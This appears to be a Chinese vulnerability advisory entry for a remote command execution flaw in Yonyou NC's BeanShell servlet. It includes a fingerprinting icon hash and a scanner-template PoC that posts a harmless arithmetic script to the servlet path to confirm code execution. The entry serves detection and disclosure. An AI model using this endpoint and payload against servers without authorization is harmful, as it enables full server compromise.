yonyou-nc-bsh-servlet-bshservlet-rce: 用友 NC bsh.servlet.BshServlet 远程命令执行漏洞

日期: 2025-09-01 | 影响软件: 用友NC bsh servlet BshServlet | POC: 已公开

漏洞描述

用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,通过BeanShell 执行远程命令获取服务器权限 icon_hash="1085941792"

PoC代码[已公开]

id: yonyou-nc-bsh-servlet-bshservlet-rce

info:
    name: 用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
    author: B1anda0
    severity: critical
    verified: true
    description: 用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,通过BeanShell 执行远程命令获取服务器权限 icon_hash="1085941792"
    reference:
        - https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
    tags: yonyou,yonyounc,rce
    created: 2023/06/26

set:
    r1: randomInt(8000, 9999)
    r2: randomInt(8000, 9999)
rules:
    r0:
        request:
            method: POST
            path: /servlet/~ic/bsh.servlet.BshServlet
            body: bsh.script=print%28{{r1}}*{{r2}}%29%3B
        expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
expression: r0()

相关漏洞推荐